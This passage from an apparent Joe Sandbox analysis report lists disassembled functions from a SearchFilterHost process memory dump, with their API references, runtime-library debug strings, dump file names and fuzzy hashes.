                                                                                                  • Instruction Fuzzy Hash: 3141033A3087829FD725DE24C840B6AB7E6FF88720F140A1DE95AD7681DB71E805CB91
                                                                                                  Function 051AB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 051E728C
                                                                                                  Strings
                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 051E7294
                                                                                                  • RTL: Resource at %p, xrefs: 051E72A3
                                                                                                  • RTL: Re-Waiting, xrefs: 051E72C1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                  • API String ID: 885266447-605551621
                                                                                                  • Opcode ID: 28777546cb4fa4ab3d9460f02b453d83da27aed10c55c4ccad7a5b224ed6d7ac
                                                                                                  • Instruction ID: e1c707b77f48934a8275cd0d8606c776c8cbca61e8a34a7f3e726d156974c87c
                                                                                                  • Opcode Fuzzy Hash: 28777546cb4fa4ab3d9460f02b453d83da27aed10c55c4ccad7a5b224ed6d7ac
                                                                                                  • Instruction Fuzzy Hash: 19411336708683ABE721DE24CC45FAAB7A6FF44710F100619F956EB280DB31E842DBD1
                                                                                                  Function 05222300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: %%%u$]:%u
                                                                                                  • API String ID: 48624451-3050659472
                                                                                                  • Opcode ID: e448d0a0026af209bfb238caac922fa91c1f3d9aa0b6c604c10da63391a5818c
                                                                                                  • Instruction ID: 251768695362a3031d03aeabd0357b2f18f53cb3da106c86459e9399301b98a4
                                                                                                  • Opcode Fuzzy Hash: e448d0a0026af209bfb238caac922fa91c1f3d9aa0b6c604c10da63391a5818c
                                                                                                  • Instruction Fuzzy Hash: 4431867AA10229EFDB24DE28CC44BEEB7F8FF44610F444555E849E3240EB31AA549BA0
                                                                                                  Function 051B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: +$-
                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                  • Instruction ID: 908f4e7719bae0f80a0a4c6a53659cb52a6cf3c341611b2c29cf633135e1073e
                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                  • Instruction Fuzzy Hash: FF91A270E0421A9FFF28DE69C880AFEB7A6FF84760F14451EE865E72C0D7B489818754
                                                                                                  Function 05179126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.2977357150.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $$@
                                                                                                  • API String ID: 0-1194432280
                                                                                                  • Opcode ID: 88f4411fd05bef8d6bed2bc1bf4aa7706433207ed59c4380de55595df548e2dc
                                                                                                  • Instruction ID: e819c5fc3956575d70fe5b5c8b872caf14c711d48cc77cc728ad737ff92abce7
                                                                                                  • Opcode Fuzzy Hash: 88f4411fd05bef8d6bed2bc1bf4aa7706433207ed59c4380de55595df548e2dc
                                                                                                  • Instruction Fuzzy Hash: B1811C75D002699BDB35DB54CC49BEEB7B9AF08750F0041DAE91AB7280E7705E85CFA0